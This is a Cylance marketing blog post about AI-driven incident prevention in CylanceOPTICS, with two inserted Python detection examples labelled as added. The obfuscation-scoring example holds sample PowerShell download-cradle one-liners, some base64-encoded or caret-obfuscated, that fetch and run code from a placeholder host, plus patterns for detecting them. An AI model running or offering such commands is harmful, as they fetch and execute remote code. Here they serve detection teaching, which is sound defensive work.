The Next Step for AI-Based Security

Cylance, the innovator in AI-based threat prevention, professed “prevention is possible” with the introduction of its next-gen anti-malware solution CylancePROTECT®, which leverages machine learning models to prevent malicious code from executing on endpoints.

With no signatures or constant updates required, Cylance provides superior prevention with minimal impact on the endpoint. Now almost four years and thousands of satisfied customers later, we are proud to say that Cylance delivers reliable, consistent threat prevention which has catalyzed a pivot in how all security vendors talk about security: prevention is possible.

One of the key capabilities of CylancePROTECT is its uncanny ability to prevent threats that have yet to even be created. In fact, in a recent commissioned lab test we found that on average our model prevented threats up to 2.5 years before they were detected in the wild.

That is astounding proactive protection when compared to reactive, signature-based security solutions that falter significantly when even a single update is not applied. We say this to illustrate one point: at Cylance, we are good at predicting the future of threats. It’s built into our products and our culture. So, it should come as no surprise that we are continually working on new ways to use AI to solve security problems.

To that end, this week at RSA we will be previewing an industry-first AI security implementation: AI-driven incident prevention in our CylanceOPTICS™ Endpoint Detection and Response (EDR) solution.

The Case for AI-Driven Incident Prevention

There is no doubt that organizations can benefit from EDR products, which enable faster response and remediation to security incidents. However, as with most security technologies, attackers have worked hard to develop tactics, techniques, and procedures (TTPs) to defeat legacy rule-based technologies, making them less effective over time.

The evolution of TTPs and their impact on security solutions very much parallels the demise of legacy antivirus (AV) products, which attackers have largely marginalized. Rule-based EDR products will soon go the way of the dodo, making way for AI-driven incident prevention. Cylance is at the forefront of this movement with the introduction of this new capability.

CylanceOPTICS AI-Driven Incident Prevention

Powered by the only purpose-built, AI threat detection model developed to run on the endpoint, CylanceOPTICS uses machine learning to analyze changes occurring on each endpoint to uncover threats that would be difficult, if not impossible, for a human analyst to uncover in a reasonable amount of time.

Unlike rule-based EDRs that require a person to write, maintain, and continually add rules (which are essentially behavior signatures) to trap single attacks, AI-driven incident prevention can render an entire class of attacks useless. A single model, trained to identify a specific attack class (or TTP), can be deployed on an endpoint, essentially eliminating the hundreds or thousands of behavior rules a security analyst would otherwise have to create and maintain to deliver comparable protection.

With AI-driven incident prevention, when a potential threat is identified, CylanceOPTICS can autonomously take decisive actions in real-time to stop the attack and avoid the cost, risk, and long-term impacts that come with a widespread security incident. This first release of AI models for threat detection and incident prevention will target the following specific attack types:

Fileless Attacks:

So-called “fileless” attacks may be fileless in the sense that they do not rely on a malicious or suspicious binary; however, they will typically rely on other system-based artifacts that can be easily sensed and correlated with CylanceOPTICS.

The Fileless Attack Model evaluates the context and parameters of system utility invocations to understand their intended outcomes.

Malicious or Suspicious “One-Liner” Commands:

Scripting engines like CMD, PowerShell, and WScript are the workhorses of IT operations, but they expose a significant amount of functionality that can be leveraged by malicious actors.

This malicious or suspicious usage becomes increasingly difficult to detect when multiple actions are strung together and hidden behind layers of obfuscation, whether encoding or the abuse of environment variables, whitespace, and other characters.

The Malicious One-Liner Model evaluates the content of command line scripts with an emphasis on the language of the script and the command line context of the script.
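To make the obfuscation layers described above concrete, here is an added Python example (not Cylance code and not the One-Liner Model itself) that normalizes a command line by stripping cmd.exe caret escapes, collapsing whitespace and decoding a PowerShell -EncodedCommand argument, then scores the normalized text with a handful of interpretable features. The sample command lines, feature names, weights and threshold are constructed for illustration; a trained model would replace the hand-picked weights, but the normalization step is what lets any model see past the encoding.

```python
"""Added example (not Cylance code): normalize layered command-line
obfuscation and score the result with a few interpretable features.
Sample lines, feature weights and the threshold are constructed."""
import base64
import re

# --- constructed sample command lines -------------------------------------
# The encoded sample is built in code so the base64 is guaranteed to round-trip.
PAYLOAD_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
ENCODED_ARG = base64.b64encode(PAYLOAD_PLAINTEXT.encode("utf-16-le")).decode("ascii")

SAMPLE_COMMAND_LINES = {
    "benign_ps":  'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    "benign_cmd": "cmd.exe /c dir C:\\Users",
    # encoding layer: PowerShell -enc takes base64 of UTF-16LE script text
    "encoded_ps": f"powershell.exe -nop -w hidden -enc {ENCODED_ARG}",
    # character layer: cmd.exe carets are escape characters and are dropped before execution
    "caret_cmd":  "cmd.exe /c p^o^w^e^r^s^h^e^l^l    -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/y')\"",
    # environment-variable layer: %COMSPEC:~-7,3% is a substring expansion yielding 'cmd'
    "envvar_cmd": "cmd.exe /c %COMSPEC:~-7,3% /c powershell -w hidden -c Get-Process",
}

# Common spellings of the encoded-command switch followed by a base64 blob.
_ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
# cmd.exe substring expansion such as %VAR:~-7,3%.
_ENV_SUBSTR_RE = re.compile(r"%\w+:~-?\d+(?:,-?\d+)?%")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/invalid."""
    match = _ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return raw.decode("utf-16-le", errors="replace")


def normalize(cmdline):
    """Strip caret escapes, collapse whitespace, append any decoded payload, lower-case."""
    text = cmdline.replace("^", "")
    text = re.sub(r"\s+", " ", text).strip()
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text += " " + re.sub(r"\s+", " ", decoded)
    return text.lower()


# (name, weight, predicate over (raw, normalized)) -- constructed weights.
FEATURES = [
    ("encoded_command",   3, lambda raw, norm: decode_encoded_command(raw) is not None),
    ("caret_escapes",     2, lambda raw, norm: raw.count("^") >= 3),
    ("envvar_substring",  3, lambda raw, norm: _ENV_SUBSTR_RE.search(raw) is not None),
    ("excess_whitespace", 1, lambda raw, norm: re.search(r"\S\s{3,}\S", raw) is not None),
    ("hidden_window",     2, lambda raw, norm: re.search(r"-w(?:indowstyle)?\s+hidden", norm) is not None),
    ("download_cradle",   3, lambda raw, norm: "downloadstring" in norm or "downloadfile" in norm),
    ("invoke_expression", 2, lambda raw, norm: re.search(r"\biex\b|invoke-expression", norm) is not None),
]


def score(cmdline):
    """Score a command line; returns the total, the features that fired and the normalized text."""
    norm = normalize(cmdline)
    hits = [name for name, _, fn in FEATURES if fn(cmdline, norm)]
    total = sum(weight for name, weight, _ in FEATURES if name in hits)
    return {"score": total, "features": hits, "normalized": norm}


def classify(cmdline, threshold=4):
    """Constructed threshold: 4 or more points is treated as suspicious."""
    return "suspicious" if score(cmdline)["score"] >= threshold else "benign"


if __name__ == "__main__":
    for label, line in SAMPLE_COMMAND_LINES.items():
        result = score(line)
        print(f"{label:11s} {classify(line):10s} score={result['score']:2d} {result['features']}")
```

Note that the encoded and caret-escaped samples carry the same script text; without the normalization step a keyword-based feature would only fire on the plain one, which is exactly the gap that layered obfuscation exploits.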

Malicious Application Behavior:

An overwhelming number of attacks target a small, predictable set of trusted applications commonly found in enterprise environments.

The Malicious Application Behavior Model learns legitimate interactions between common software and the Operating System and blocks anything that veers too far off course.
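As an added illustration of the baselining idea (not Cylance code and not the Malicious Application Behavior Model), the following Python learns which parent/child process launches are normal from a constructed learning window and flags launches that deviate from that baseline. The process names, event counts and the min_support value are assumptions for the example; the point it shows is that a pair seen only a couple of times during learning is not automatically trusted.

```python
"""Added example (not Cylance code): a parent/child process baseline that
flags launches not seen often enough during a learning window.
Process names, counts and min_support are constructed for illustration."""
from collections import Counter, defaultdict

# Constructed telemetry from a "known-good" learning window: (parent, child) pairs.
TRAINING_EVENTS = (
    [("explorer.exe", "winword.exe")] * 40
    + [("explorer.exe", "outlook.exe")] * 35
    + [("outlook.exe", "winword.exe")] * 20
    + [("winword.exe", "splwow64.exe")] * 12
    + [("services.exe", "svchost.exe")] * 90
    + [("explorer.exe", "cmd.exe")] * 8
    + [("winword.exe", "excel.exe")] * 2      # rare pair: below min_support
)


class ProcessBaseline:
    """Learns trusted (parent, child) pairs and scores new launches against them."""

    def __init__(self, min_support=3):
        self.min_support = min_support   # minimum sightings before a pair is trusted
        self.pair_counts = Counter()
        self.children_by_parent = defaultdict(set)

    def fit(self, events):
        """Count every pair in the learning window; only frequent pairs become baseline."""
        self.pair_counts.update(events)
        for (parent, child), count in self.pair_counts.items():
            if count >= self.min_support:
                self.children_by_parent[parent].add(child)
        return self

    def evaluate(self, parent, child):
        """Classify a launch as baseline, deviation (known parent, unusual child)
        or unknown_parent (no baseline exists for this parent at all)."""
        seen = self.pair_counts.get((parent, child), 0)
        if parent not in self.children_by_parent:
            verdict = "unknown_parent"
        elif child in self.children_by_parent[parent]:
            verdict = "baseline"
        else:
            verdict = "deviation"
        return {"parent": parent, "child": child, "verdict": verdict, "seen_in_training": seen}

    def evaluate_many(self, events):
        """Return only the launches that are not in the baseline."""
        return [r for r in (self.evaluate(p, c) for p, c in events) if r["verdict"] != "baseline"]


# Constructed launches to check against the learned baseline.
TEST_EVENTS = [
    ("winword.exe", "splwow64.exe"),   # normal print-spooler helper
    ("winword.exe", "cmd.exe"),        # document spawning a shell: never seen
    ("winword.exe", "excel.exe"),      # seen twice, below min_support
    ("acrobat.exe", "cmd.exe"),        # parent absent from the learning window
]


def build_baseline():
    return ProcessBaseline(min_support=3).fit(TRAINING_EVENTS)


if __name__ == "__main__":
    baseline = build_baseline()
    for parent, child in TEST_EVENTS:
        print(baseline.evaluate(parent, child))
```

A deployment would key the baseline on more than image names (signer, command-line shape, user context), but the structure stays the same: learn what the trusted application normally does, then act on what veers too far from it.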

The Future of AI-based Incident Prevention

The term “Artificial Intelligence” (AI) has been co-opted by many vendors to give the impression that they are offering cutting-edge security capabilities. As the innovator of AI-based security tools, we at Cylance will continue to deliver new AI models targeted at specific TTPs. Beyond that, we continually look at other implementations of AI that will solve the security problems of the future.

One thing is for sure: whether you are a solo attacker or a nation-state actor, your job just got a lot harder with the introduction of AI-based incident prevention in CylanceOPTICS.

Be sure to visit us at booth #3911 in the North Hall at the RSA conference to get a preview of our AI-driven incident prevention and sign up for our webinar. See you then!